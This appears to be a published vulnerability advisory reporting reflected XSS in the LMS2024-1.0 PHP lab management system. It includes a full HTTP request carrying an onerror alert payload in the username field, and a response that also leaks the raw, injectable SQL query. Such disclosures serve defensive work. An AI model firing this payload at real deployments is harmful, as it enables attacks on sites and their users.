LMS2024-1.0 XSS-Reflected Information Disclosure

2024.10.05

nu11secur1ty (BG)

Risk: High

Local: Yes

Remote: Yes

CVE: N/A

CWE: N/A

## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure
## Author: nu11secur1ty
## Date: 00/04/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette
## Reference: https://portswigger.net/web-security/cross-site-scripting
## Description:
The value of the username request parameter is copied into the HTML document as plain text between tags. The payload ro2iz<img src=a onerror=alert(1)>xggkt was submitted in the username parameter. This input was echoed unmodified in the application's response.
STATUS: HIGH- Vulnerability
[+]Exploits:
- XSS-Reflected:
```xss
POST /php-lms/classes/Login.php?f=login HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqml
Origin: https://pwnedhost.com
X-Requested-With: XMLHttpRequest
Referer: https://pwnedhost.com/php-lms/admin/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 37
username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7
```
+ [Response]
```
HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 08:27:39 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 177
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"incorrect","last_qry":"SELECT * from users where username = 'VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password = md5('45ec487cfe5b3bac8e61740ae8dbcd06') "}
```
## Reproduce:
[href](https://www.patreon.com/nu11secur1ty)
## Demo PoC:
[href](https://www.patreon.com/nu11secur1ty)
## Time spent:
00:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

LMS2024-1.0 XSS-Reflected Information Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.